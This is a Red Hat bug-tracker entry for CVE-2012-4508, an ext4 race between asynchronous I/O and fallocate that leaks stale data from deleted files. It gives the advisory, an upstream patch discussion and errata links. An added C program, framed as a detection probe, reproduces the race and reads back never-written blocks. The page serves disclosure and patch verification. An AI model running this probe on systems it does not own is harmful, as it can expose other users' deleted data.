Bug 869904 (CVE-2012-4508) - CVE-2012-4508 kernel: ext4: AIO vs fallocate stale data exposure
Summary: CVE-2012-4508 kernel: ext4: AIO vs fallocate stale data exposure
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2012-4508
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: high
Severity: high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 869905 869906 869907 869908 869909 869910 869911 1022626
Blocks: 870156
 
Reported: 2012-10-25 06:21 UTC by Petr Matousek
Modified: 2023-05-11 20:17 UTC (History)
CC List: 27 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2013-08-24 14:07:02 UTC
Embargoed:


Attachments


Links
System                 | ID             | Private | Priority | Status       | Summary                                                       | Last Updated
Red Hat Product Errata | RHSA-2012:1491 | 0       | normal   | SHIPPED_LIVE | Important: kernel-rt security and bug fix update              | 2012-12-05 00:50:25 UTC
Red Hat Product Errata | RHSA-2012:1540 | 0       | normal   | SHIPPED_LIVE | Important: kernel security, bug fix, and enhancement update   | 2012-12-05 01:51:24 UTC
Red Hat Product Errata | RHSA-2013:0496 | 0       | normal   | SHIPPED_LIVE | Important: Red Hat Enterprise Linux 6 kernel update           | 2013-02-20 21:40:54 UTC
Red Hat Product Errata | RHSA-2013:1519 | 0       | normal   | SHIPPED_LIVE | Important: kernel security and bug fix update                 | 2013-11-13 23:52:26 UTC
Red Hat Product Errata | RHSA-2013:1783 | 0       | normal   | SHIPPED_LIVE | Important: kernel security and bug fix update                 | 2013-12-05 22:07:09 UTC

Description Petr Matousek 2012-10-25 06:21:58 UTC
A race condition flaw has been found in the way asynchronous I/O and fallocate interact, which can lead to exposure of stale data -- that is, an extent which should have had the "uninitialized" bit set, indicating that its blocks have not yet been written and thus contain data from a deleted file. An unprivileged local user could use this flaw to cause an information leak.

Acknowledgements:

Red Hat would like to thank Theodore Ts'o for reporting this issue. Upstream acknowledges Dmitry Monakhov as the original reporter.

References:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=dee1f973ca341c266229faa5a1a5bb268bed3531
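
As an added illustration of the exposure described above (example code written for this page, not Red Hat's or the upstream kernel's), the following Linux C program performs the sequence the description names: it preallocates an unwritten extent with fallocate(), submits one AIO direct-I/O write into it with the native io_submit() syscall, fallocates an adjacent range while that write is in flight, and then reads back blocks that were never written. Any non-zero byte in those blocks is stale data from previously freed blocks. The 1 MiB/64 KiB layout, the default path under /tmp and the O_DIRECT fallback value are assumptions of the example; whether the race actually fires on a given run is timing dependent, so this is a check for leaked data, not a reliable reproducer.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE          /* O_DIRECT and fallocate() in glibc headers */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>   /* struct iocb, struct io_event, IOCB_CMD_PWRITE */

#ifndef O_DIRECT
#define O_DIRECT 040000      /* asm-generic value (x86, arm64); an assumption on other arches */
#endif
int fallocate(int fd, int mode, off_t offset, off_t len);   /* glibc wrapper prototype */

/* Probe layout chosen for this example (assumption, not from the advisory):
 * two adjacent 1 MiB preallocated ranges A and B; only the first 64 KiB of A
 * is ever written, so every other block must read back as zeros. */
#define BLK        4096UL
#define RANGE_LEN  (1024UL * 1024UL)
#define WRITE_LEN  (64UL * 1024UL)

enum { PROBE_CLEAN = 0, PROBE_STALE = 1 };   /* stale_data_probe() results; <0 is -errno */

/* Number of non-zero bytes in buf. In a block that was preallocated but never
 * written, any non-zero byte is stale content left over from freed blocks. */
size_t count_nonzero(const unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        n += buf[i] != 0;
    return n;
}

/* Ordering from the description: an AIO direct-I/O write into an unwritten
 * extent is in flight while an adjacent range is fallocated; afterwards the
 * never-written blocks are read back. PROBE_STALE is a definite leak; a clean
 * result only means the race did not fire on this run. */
int stale_data_probe(const char *path)
{
    int rc, fd = open(path, O_RDWR | O_CREAT | O_TRUNC | O_DIRECT, 0600);
    if (fd < 0) { rc = -errno; unlink(path); return rc; }
    unlink(path);                           /* keep the probe inode anonymous */

    unsigned char *wbuf = NULL, *rbuf = NULL;
    aio_context_t ctx = 0;
    if (posix_memalign((void **)&wbuf, BLK, WRITE_LEN) ||
        posix_memalign((void **)&rbuf, BLK, BLK)) { rc = -ENOMEM; goto out; }
    memset(wbuf, 0xA5, WRITE_LEN);          /* pattern that can never pass as zeros */

    /* Range A: one unwritten extent, i_size = 1 MiB. */
    if (fallocate(fd, 0, 0, RANGE_LEN)) { rc = -errno; goto out; }

    if (syscall(SYS_io_setup, 1, &ctx)) { rc = -errno; goto out; }
    struct iocb cb; memset(&cb, 0, sizeof cb);  /* aio_offset stays 0 */
    cb.aio_lio_opcode = IOCB_CMD_PWRITE;
    cb.aio_fildes     = (uint32_t)fd;
    cb.aio_buf        = (uint64_t)(uintptr_t)wbuf;
    cb.aio_nbytes     = WRITE_LEN;
    struct iocb *cbs[1] = { &cb };
    if (syscall(SYS_io_submit, ctx, 1, cbs) != 1) { rc = -errno; goto out; }

    /* Range B, adjacent to A: the extent tree may merge it with A's unwritten
     * extent before the in-flight write has been converted to "initialized". */
    if (fallocate(fd, 0, RANGE_LEN, RANGE_LEN)) { rc = -errno; goto out; }

    struct io_event ev;
    if (syscall(SYS_io_getevents, ctx, 1, 1, &ev, NULL) != 1) { rc = -errno; goto out; }
    if (ev.res != (int64_t)WRITE_LEN) { rc = -EIO; goto out; }

    /* Never-written blocks: just past the write, end of A, start of B. */
    off_t probes[] = { WRITE_LEN, RANGE_LEN - BLK, RANGE_LEN + BLK };
    rc = PROBE_CLEAN;
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        ssize_t got = pread(fd, rbuf, BLK, probes[i]);
        if (got != (ssize_t)BLK) { rc = got < 0 ? -errno : -EIO; break; }
        if (count_nonzero(rbuf, BLK)) { rc = PROBE_STALE; break; }
    }
out:
    if (ctx) syscall(SYS_io_destroy, ctx);
    free(wbuf); free(rbuf); close(fd);
    return rc;
}

int main(int argc, char **argv)
{
    /* Point the probe at a file on the ext4 volume under test. */
    const char *path = argc > 1 ? argv[1] : "/tmp/cve-2012-4508-probe.bin";
    int rc = stale_data_probe(path);
    if (rc < 0)  printf("probe not run: %s\n", strerror(-rc));
    else if (rc) printf("STALE DATA read back from never-written blocks\n");
    else         printf("clean: never-written blocks read as zeros\n");
    return rc < 0 ? 2 : rc;
}
```

Run it as an unprivileged user with a path on the ext4 mount being checked; a negative result (no O_DIRECT, fallocate or AIO support on that file system) means the probe could not run rather than that the kernel is fixed. Because the window is narrow, a real stress test loops the probe many times and issues the second fallocate from another thread; one clean pass is not evidence that the fix is present.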

Comment 1 Petr Matousek 2012-10-25 06:24:22 UTC
Created attachment 633181 [details]
Upstream patches

Theodore Ts'o writes:

"There are two ways of patching this bug.  One is to apply the entire
set of AIO/DIO race fixes, which will fix a number of other bugs (some
of which can cause the system to deadlock if the right stress tester
is run).  All but the last two patches in the enclosed tar file are in
the ext4.git tree and will shortly be pushed to Linus.  The last two
will fix stale data exposure bug.

A simpler fix is to simply apply the last patch in this patch series.
This should work on all older kernels; the downside of applying just
the last patch is that there is a slight risk of data loss if the file
system is full at the point where we have the AIO/fallocate race,
*AND* the leaf node in extent tree is full, requiring a block
allocation in order to split an extent so we can mark part of the
extent as being uninitialized.  This is a very hard-to-hit corner
case, so it should be OK to just apply the last patch in this series.

Applying the entire patch series will allow us to significantly reduce
the chances of this corner case happening.  The enclosed tar file has
these patches ported to the 3.6 kernel; it should not be hard to make
them apply for older kernels as necessary."

The last patch is also referenced in comment #0.

Comment 5 Petr Matousek 2012-10-25 06:29:36 UTC
Created kernel tracking bugs for this issue

Affects: fedora-all [bug 869909]

Comment 7 errata-xmlrpc 2012-12-04 19:59:30 UTC
This issue has been addressed in the following products:

  MRG for RHEL-6 v.2

Via RHSA-2012:1491 https://rhn.redhat.com/errata/RHSA-2012-1491.html

Comment 8 errata-xmlrpc 2012-12-04 20:53:28 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 5

Via RHSA-2012:1540 https://rhn.redhat.com/errata/RHSA-2012-1540.html

Comment 9 errata-xmlrpc 2013-02-21 06:53:20 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6

Via RHSA-2013:0496 https://rhn.redhat.com/errata/RHSA-2013-0496.html

Comment 11 errata-xmlrpc 2013-11-13 18:54:05 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6.2 EUS - Server and Compute Node Only

Via RHSA-2013:1519 https://rhn.redhat.com/errata/RHSA-2013-1519.html

Comment 12 errata-xmlrpc 2013-12-05 17:09:01 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6.3 EUS - Server and Compute Node Only

Via RHSA-2013:1783 https://rhn.redhat.com/errata/RHSA-2013-1783.html

